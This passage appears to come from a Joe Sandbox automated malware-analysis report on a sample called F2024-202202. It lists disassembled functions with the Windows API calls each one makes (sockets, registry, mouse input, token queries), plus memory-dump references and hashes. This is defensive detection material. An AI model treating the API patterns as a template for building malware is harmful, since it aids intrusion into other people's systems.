              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: EnumFreeLibrary$CloseDeleteOpen
              • String ID:
              • API String ID: 395352322-0
              • Opcode ID: 7078e38bf7e3dc16666b904d8a8238e956b6b96c121c044724d656719d656bf8
              • Instruction ID: 5f5a856ff754ca26847ea203a3f5f377cee0f0b04b73b89ba44f41668fa86123
              • Opcode Fuzzy Hash: 7078e38bf7e3dc16666b904d8a8238e956b6b96c121c044724d656719d656bf8
              • Instruction Fuzzy Hash: F6311E71911219BFDB15DF90EC89EFFB7BCEF08300F0001A9E905E2592DB749E959AA0
              Function 0020653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
              Download Yara Rule
              APIs
              • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0020655B
              • GetWindowLongW.USER32(014260A8,000000F0), ref: 0020658E
              • GetWindowLongW.USER32(014260A8,000000F0), ref: 002065C3
              • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 002065F5
              • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0020661F
              • GetWindowLongW.USER32(00000000,000000F0), ref: 00206630
              • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0020664A
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: LongWindow$MessageSend
              • String ID:
              • API String ID: 2178440468-0
              • Opcode ID: 38c5518e7e2b0ff2467757f719cc46ebe13906d05b188a60544fc3e3c2e2c59c
              • Instruction ID: 1557c7e3bd783e0b9fbb4a76433dc3b07c7f5f286a4064dc99e2846ce496511a
              • Opcode Fuzzy Hash: 38c5518e7e2b0ff2467757f719cc46ebe13906d05b188a60544fc3e3c2e2c59c
              • Instruction Fuzzy Hash: 59310F34654311AFDB208F28EC8DF553BE5BB4A710F5801A8F6118B6F6CB62AC649B41
              Function 001F6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 001F80CB
              • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 001F64D9
              • WSAGetLastError.WSOCK32(00000000), ref: 001F64E8
              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001F6521
              • connect.WSOCK32(00000000,?,00000010), ref: 001F652A
              • WSAGetLastError.WSOCK32 ref: 001F6534
              • closesocket.WSOCK32(00000000), ref: 001F655D
              • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 001F6576
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
              • String ID:
              • API String ID: 910771015-0
              • Opcode ID: da779ac50f4978109b569650c8eacce7e9511de82ba451a59cb197823fc26b63
              • Instruction ID: c89fdc03255c038aeb5d403a0b475c5f32845df731bacb02efd98dd9af7ecbd8
              • Opcode Fuzzy Hash: da779ac50f4978109b569650c8eacce7e9511de82ba451a59cb197823fc26b63
              • Instruction Fuzzy Hash: E9319371600218AFDB10AF64DC89BBE7BA9EB44754F048169FA05A7291DB74AD04CBA1
              Function 001DE0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
              Download Yara Rule
              APIs
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DE0FA
              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 001DE120
              • SysAllocString.OLEAUT32(00000000), ref: 001DE123
              • SysAllocString.OLEAUT32 ref: 001DE144
              • SysFreeString.OLEAUT32 ref: 001DE14D
              • StringFromGUID2.OLE32(?,?,00000028), ref: 001DE167
              • SysAllocString.OLEAUT32(?), ref: 001DE175
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
              • String ID:
              • API String ID: 3761583154-0
              • Opcode ID: 27759f7f51021993643d3b444b7ef727d1aec0af92dfb549be15e2b1e0445dc4
              • Instruction ID: fd133f43ea6ee58ac15bbce4116972598df2fcf71783988bd119a56d8dd6dc96
              • Opcode Fuzzy Hash: 27759f7f51021993643d3b444b7ef727d1aec0af92dfb549be15e2b1e0445dc4
              • Instruction Fuzzy Hash: DB214135744208AFDB20BFA8DD88DAB77ECEB09761B108126FA15CB661DB70DC41CB64
              Function 0020783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00181D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00181D73
                • Part of subcall function 00181D35: GetStockObject.GDI32(00000011), ref: 00181D87
                • Part of subcall function 00181D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00181D91
              • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 002078A1
              • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 002078AE
              • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 002078B9
              • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 002078C8
              • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 002078D4
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: MessageSend$CreateObjectStockWindow
              • String ID: Msctls_Progress32
              • API String ID: 1025951953-3636473452
              • Opcode ID: 1dcaf1c771825eed88a8a41ca1a8541d283681f64b93b319d36317f69b147a6f
              • Instruction ID: 861fdada071af31b1a88ed85d53e94255fcb54e8f090bf0f043fa99dd11bc779
              • Opcode Fuzzy Hash: 1dcaf1c771825eed88a8a41ca1a8541d283681f64b93b319d36317f69b147a6f
              • Instruction Fuzzy Hash: C711B2B255021ABFEF159F60CC89EE77F6DEF09758F018114FA04A20A1C772AC21DBA0
              Function 001A41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,001A4292,?), ref: 001A41E3
              • GetProcAddress.KERNEL32(00000000), ref: 001A41EA
              • EncodePointer.KERNEL32(00000000), ref: 001A41F6
              • DecodePointer.KERNEL32(00000001,001A4292,?), ref: 001A4213
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
              • String ID: RoInitialize$combase.dll
              • API String ID: 3489934621-340411864
              • Opcode ID: 4593f135a093f707678d6eccdf245bc8616ce0cf49883255ff2f2590c646761d
              • Instruction ID: 70cd884d42b95e6a8aef8adbdbcce2c2cdbd413a2ef2153f696a4e8e55e4eb9d
              • Opcode Fuzzy Hash: 4593f135a093f707678d6eccdf245bc8616ce0cf49883255ff2f2590c646761d
              • Instruction Fuzzy Hash: 50E01AF86D0340AFEB606BB0FD4DB443AA5B7A7706F108464F419E54E1DBB564E58F00
              Function 001A429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,001A41B8), ref: 001A42B8
              • GetProcAddress.KERNEL32(00000000), ref: 001A42BF
              • EncodePointer.KERNEL32(00000000), ref: 001A42CA
              • DecodePointer.KERNEL32(001A41B8), ref: 001A42E5
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
              • String ID: RoUninitialize$combase.dll
              • API String ID: 3489934621-2819208100
              • Opcode ID: 425744716d7f9ce7c9ffcc030177cac501e25a79324abfeba2a1e4d6d86ea6c0
              • Instruction ID: 0c90303210eb5670447ee80345e3b888bf9c5a42608a3ceacd31ac62b5882307
              • Opcode Fuzzy Hash: 425744716d7f9ce7c9ffcc030177cac501e25a79324abfeba2a1e4d6d86ea6c0
              • Instruction Fuzzy Hash: D6E0EC7C5D1300EFEB60AF60FE0EB443AA4B766B42F204065F009E18A1CBF44594CB14
              Function 001E675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: _memmove$__itow__swprintf
              • String ID:
              • API String ID: 3253778849-0
              • Opcode ID: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
              • Instruction ID: 8808a9cfe64b29decea3301a8cafc7bf1448d1b5149b32171aa84f59cacbc98a
              • Opcode Fuzzy Hash: 2ac74d2e030658137b5ee0dcb8b02025e330d3075783c8fac3e9a08f62e1acb0
              • Instruction Fuzzy Hash: 7C61EF34500A8AAFCF15FF21CC82EFE37A5AF25348F484419F8555B292DB309E41CB50
              Function 0020046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00187F41: _memmove.LIBCMT ref: 00187F82
                • Part of subcall function 002010A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00200038,?,?), ref: 002010BC
              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00200548
              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00200588
              • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 002005AB
              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 002005D4
              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00200617
              • RegCloseKey.ADVAPI32(00000000), ref: 00200624
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
              • String ID:
              • API String ID: 4046560759-0
              • Opcode ID: 7ffe5afef40cb7881565953d0a527ccc6534144eb9722e276393a48c0515f3f6
              • Instruction ID: f22075b48590048f85909298a2769730e8d3826ac993c4b361fafa457f6e6b9c
              • Opcode Fuzzy Hash: 7ffe5afef40cb7881565953d0a527ccc6534144eb9722e276393a48c0515f3f6
              • Instruction Fuzzy Hash: 3F514231218300AFDB14EF64C885E6EBBE9FF98314F04492DF595872A2DB71EA14CB52
              Function 00205A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
              Download Yara Rule
              APIs
              • GetMenu.USER32(?), ref: 00205A82
              • GetMenuItemCount.USER32(00000000), ref: 00205AB9
              • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00205AE1
              • GetMenuItemID.USER32(?,?), ref: 00205B50
              • GetSubMenu.USER32(?,?), ref: 00205B5E
              • PostMessageW.USER32(?,00000111,?,00000000), ref: 00205BAF
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$Item$CountMessagePostString
              • String ID:
              • API String ID: 650687236-0
              • Opcode ID: 05f905ea6f15bc5a2b0433ca98a28ebf414924ab2bcdbc71ef55fb451dc522d4
              • Instruction ID: ef89fe7d08f3d0225baed51ba7ef82500c47cae9d031c2a5da35dfb5f288cd89
              • Opcode Fuzzy Hash: 05f905ea6f15bc5a2b0433ca98a28ebf414924ab2bcdbc71ef55fb451dc522d4
              • Instruction Fuzzy Hash: 93516F35A00626AFCB15EF64C985AAEB7B4EF58314F144459F811B7392CB74AE41CF90
              Function 001DF3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
              Download Yara Rule
              APIs
              • VariantInit.OLEAUT32(?), ref: 001DF3F7
              • VariantClear.OLEAUT32(00000013), ref: 001DF469
              • VariantClear.OLEAUT32(00000000), ref: 001DF4C4
              • _memmove.LIBCMT ref: 001DF4EE
              • VariantClear.OLEAUT32(?), ref: 001DF53B
              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001DF569
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Variant$Clear$ChangeInitType_memmove
              • String ID:
              • API String ID: 1101466143-0
              • Opcode ID: 412906a99db9c1b083ca8a3f0f02da0a9fd0bd25749ddb4c10fc111b4dc1c3dd
              • Instruction ID: 9db9adb4b94acc4c33b6734f9133ee5fea31aa1e39f510743368cfbd421678d9
              • Opcode Fuzzy Hash: 412906a99db9c1b083ca8a3f0f02da0a9fd0bd25749ddb4c10fc111b4dc1c3dd
              • Instruction Fuzzy Hash: 15513D75A002099FCB14CF58D884AAAB7F8FF4C354F15856AED59DB311D730EA52CB60
              Function 001E26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 001E2747
              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001E2792
              • IsMenu.USER32(00000000), ref: 001E27B2
              • CreatePopupMenu.USER32 ref: 001E27E6
              • GetMenuItemCount.USER32(000000FF), ref: 001E2844
              • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 001E2875
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
              • String ID:
              • API String ID: 3311875123-0
              • Opcode ID: 124e20fa4dd6723890adae3072f05c5987de947b8fafdb01fd8cfe593a955a21
              • Instruction ID: af2c39be852a2f5df556ae1bd07eddaa26561560667268bac3e4adca8067af10
              • Opcode Fuzzy Hash: 124e20fa4dd6723890adae3072f05c5987de947b8fafdb01fd8cfe593a955a21
              • Instruction Fuzzy Hash: 8251D270A00B89EFDF24CF6AD8A8FAEBBF8BF15314F144169E8159B291D7708944CB51
              Function 00181765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00182612: GetWindowLongW.USER32(?,000000EB), ref: 00182623
              • BeginPaint.USER32(?,?,?,?,?,?), ref: 0018179A
              • GetWindowRect.USER32(?,?), ref: 001817FE
              • ScreenToClient.USER32(?,?), ref: 0018181B
              • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0018182C
              • EndPaint.USER32(?,?), ref: 00181876
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: PaintWindow$BeginClientLongRectScreenViewport
              • String ID:
              • API String ID: 1827037458-0
              • Opcode ID: 0323c36fb1233e33148b1d4a4aabb316af9c7331ed6196ca27b6035c754f1ee2
              • Instruction ID: c520ae6c666a54ea3659ad64fe2be63116cd989eb7176c09d95602d49d1fe07f
              • Opcode Fuzzy Hash: 0323c36fb1233e33148b1d4a4aabb316af9c7331ed6196ca27b6035c754f1ee2
              • Instruction Fuzzy Hash: 0941B071504300AFD720EF24DC89FBA7BECFB5A724F140629F9A4871A2C7719946DB62
              Function 0020B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
              Download Yara Rule
              APIs
              • ShowWindow.USER32(002467B0,00000000,014260A8,?,?,002467B0,?,0020B862,?,?), ref: 0020B9CC
              • EnableWindow.USER32(00000000,00000000), ref: 0020B9F0
              • ShowWindow.USER32(002467B0,00000000,014260A8,?,?,002467B0,?,0020B862,?,?), ref: 0020BA50
              • ShowWindow.USER32(00000000,00000004,?,0020B862,?,?), ref: 0020BA62
              • EnableWindow.USER32(00000000,00000001), ref: 0020BA86
              • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0020BAA9
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Show$Enable$MessageSend
              • String ID:
              • API String ID: 642888154-0
              • Opcode ID: 570dc46df7f6d03ec006062897e8ed946f887adc6df767b8e69ed1ada3a90cc3
              • Instruction ID: 47e7bfd1329610fe46709bdfeeee0859f87dc01021f0638acdc17eaced0532b2
              • Opcode Fuzzy Hash: 570dc46df7f6d03ec006062897e8ed946f887adc6df767b8e69ed1ada3a90cc3
              • Instruction Fuzzy Hash: 22414E30650346AFDB32CF18D589B957BE0FB05310F1842A9EA588F6A3C731A855CFA1
              Function 001F73B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON
              Download Yara Rule
              APIs
              • GetForegroundWindow.USER32(?,?,?,?,?,?,001F5134,?,?,00000000,00000001), ref: 001F73BF
                • Part of subcall function 001F3C94: GetWindowRect.USER32(?,?), ref: 001F3CA7
              • GetDesktopWindow.USER32 ref: 001F73E9
              • GetWindowRect.USER32(00000000), ref: 001F73F0
              • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 001F7422
                • Part of subcall function 001E54E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 001E555E
              • GetCursorPos.USER32(?), ref: 001F744E
              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 001F74AC
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
              • String ID:
              • API String ID: 4137160315-0
              • Opcode ID: c88eca3f0907a585ab10f10d369887088d62dcbdd07eb29a53ab3b1b19053134
              • Instruction ID: 13a7e4c5cf0210136d238031cf1d24de9819daf0f4d30345f3c2a06fe4521ceb
              • Opcode Fuzzy Hash: c88eca3f0907a585ab10f10d369887088d62dcbdd07eb29a53ab3b1b19053134
              • Instruction Fuzzy Hash: C631B472509309ABD720DF54DC49F6BBBEAFF98314F000919F99997191DB30E909CB92
              Function 001D8D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
              Download Yara Rule
              APIs
                • Part of subcall function 001D85F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 001D8608
                • Part of subcall function 001D85F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 001D8612
                • Part of subcall function 001D85F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 001D8621
                • Part of subcall function 001D85F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 001D8628
                • Part of subcall function 001D85F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 001D863E
              • GetLengthSid.ADVAPI32(?,00000000,001D8977), ref: 001D8DAC
              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 001D8DB8
              • HeapAlloc.KERNEL32(00000000), ref: 001D8DBF
              • CopySid.ADVAPI32(00000000,00000000,?), ref: 001D8DD8
              • GetProcessHeap.KERNEL32(00000000,00000000,001D8977), ref: 001D8DEC
              • HeapFree.KERNEL32(00000000), ref: 001D8DF3
              Memory Dump Source
              • Source File: 00000000.00000002.2016079260.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
              • Associated: 00000000.00000002.2016053085.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.000000000020F000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016126987.0000000000235000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016167763.000000000023F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2016188273.0000000000248000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_180000_F2024-202202.jbxd
              Similarity
              • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
              • String ID:
              • API String ID: 3008561057-0
              • Opcode ID: 1f4298b8853d4d8a72656a4ec54e33fd5781e4d5ef03465f185c8bcd68dcb1be
              • Instruction ID: 31491cd9306d1a90ac1569a51c6865bb65c9d485894bf5ac2ab6ae6d78a80a2c
              • Opcode Fuzzy Hash: 1f4298b8853d4d8a72656a4ec54e33fd5781e4d5ef03465f185c8bcd68dcb1be
              • Instruction Fuzzy Hash: 9611E132540B04FFDB60DFA4DD08FAEB77AEF54315F10402AE88593291CB319900CB60
              Function 001D8AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
              Download Yara Rule
              APIs
